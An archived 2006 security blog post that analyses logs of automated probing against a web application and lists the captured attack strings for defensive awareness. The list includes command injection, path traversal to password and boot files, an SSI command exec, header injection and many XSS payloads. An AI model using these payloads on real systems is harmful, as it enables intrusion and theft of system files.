Quick Links: SpywareGuide Greynets Blog | SpywareGuide Product Database | SpywareGuide Company Database | SpywareGuide Categories
SpywareGuide powered by FaceTime Security Labs
Search SpywareGuide Greynets Database & Site
Security Email Alerts & Updates
 
Search the Blog
 
Recent Posts
Categories
Monthly Blog Archives
Links
Subscribe
Subscribe to this blog's feed
About the Blog
About SpywareGuide Greynets Blog
Link to Us
Link to SpywareGuide.com

« Pondering Security and My Perspective... | Main | Dell Decrappifier- From Cluttered to Pristine »

  • The Attack on Web Applications- Using Jedi Foresight

Level: Advanced

While conducting log analysis around a new web application we have been developing the ever vigilant Obijan
noticed what appears to be an individual using automated tools to probe the application
in several nefarious ways. We can also assume that they are running the same styles of attack
on all forms sitewide.

For example here we see attempts at:
- SQL Injection
- Path Traversal
- Remote Execution
- SSI (Server Side Includes)
- XSS (Cross Site Scripting)


The requests originated from this IP address: 69.3.195.226.
OrgName: Covad Communications Co.
OrgID: CVAD
Address: 2510 Zanker Rd.
City: San Jose
StateProv: CA
PostalCode: 95131
Country: US
Fortunately all the attacks were unsuccessful, but it is something to always
keep in mind when designing applications. Any application you put online will
be found by spiders and will be hammered at in any way, shape or form possible.
Here is a sample of some of the not so nice "requests" this person
made.

"`id`"
""
"id"
"|id"
"/../../../../../../../../../../etc/passwd"
"/../../../../../../../../../../etc/passwd^^"
"id"
"/../../../../../../../../../../../boot.ini"
"/../../../../../../../../../../../boot.ini"
"`"
"/etc/passwd"
"/boot.ini"
"
"
"%00"
"%0a"
".\\./.\\./.\\./.\\./.\\./.\\./etc/passwd"
"/../../../../../../../../bin/id|"
"/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini"
"/./././././././././././etc/passwd"
"/..\../..\../..\../..\../..\../..\../etc/passwd"
"/..\../..\../..\../..\../..\../..\../boot.ini"
"/./././././././././././boot.ini"
"/../../../../../../../../*"
","
";"
"\'"
"/'"
"*'"
""
"*"
"/"
""
"<!--#exec cmd=""/bin/cat /etc/passwd""-->"
"
/bin/cat /etc/passwd"
"/../../../../../../../../../../boot.ini"
";id;"
"\\'/bin/cat /etc/passwd\\'"
"`dir`"
"'"
"..\..\..\..\..\..\..\..\..\..\boot.ini"
"..\..\..\..\..\..\..\..\..\..\boot.ini"
"\..\..\..\..\..\..\..\..\..\..\boot.ini"
"..\..\..\..\..\..\..\..\..\..\etc\passwd"
"\..\..\..\..\..\..\..\..\..\..\etc\passwd"
"..\..\..\..\..\..\..\..\..\..\etc\passwd"
"\..\..\..\..\..\..\..\..\..\..\etc\passwd"
"C:\boot.ini"
"C:/boot.ini"
"/../../../../../../../../../../../boot.ini"
"/../../../../../../../../../../../boot.ini"
"/../../../../../../../../../../../etc/passwd"
"/../../../../../../../../../../../etc/passwd"
"
InjectedHeader: InjectedValue"
""";id"""
"|id|"
"/index.html|id|"
"../../../../../../../../conf/server.xml"
"<script>SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS</script>"
""" style=""background:url(javascript:alert(SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS))""
"""
"'><script>alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS')</script><'"
"""><script>alert(""SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS"")</script><"""
"' alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS') '"
""" alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS')
"""
"<\0script>alert(""SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS"");<s\0cript>"
"<IMG SRC=""javascript:alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS');"">"
"""><LINK REL=""stylesheet"" HREF=""javascript:alert('SPI_XSS');"">"
"""><IMG STYLE='xss:expre\ssion(alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS'))'>"
"""><BODY ONLOAD=alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS')>"
"""><STYLE>@im\port""\ja\vasc\ript:alert('XSS')"";</STYLE>"
"""><IMG SRC='vbscript:msgbox(""SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS"")'><"""
"""><TABLE BACKGROUND=""javascript:alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS')""><"
"<script>SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS</script>"
""" style=""background:url(javascript:alert(SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS))""
"""
"'><script>alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS')</script><'"
"""><script>alert(""SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS"")</script><"""
"' alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS') '"
""" alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS')
"""
"<\0script>alert(""SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS"");<s\0cript>"
"<IMG SRC=""javascript:alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS');"">"
"""><IMG STYLE='xss:expre\ssion(alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS'))'>"
"""><BODY ONLOAD=alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS')>"
"""><IMG SRC='vbscript:msgbox(""SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS"")'><"""
"""><TABLE BACKGROUND=""javascript:alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS')""><"

Posted by Wayne Porter on April 11, 2006 07:15 PM |

  • TrackBack

Listed below are links to weblogs that reference The Attack on Web Applications- Using Jedi Foresight:

» Necklaces from Necklaces
Wow this is a really nice blog [Read More]

Tracked on April 22, 2007 03:44 PM

» 3 In 1 Credit Report from 3 In 1 Credit Report
Hi. I think you have a really nice blog. [Read More]

Tracked on April 25, 2007 02:04 AM

Site EULA | Site Map | Contact Us | About Us | Site and Spyware FAQ | Advertise | RSS Feeds  | Link To Us | SpywareGuide JapanJapanese

© Copyright 2006, FaceTime Communications, Inc. All rights reserved.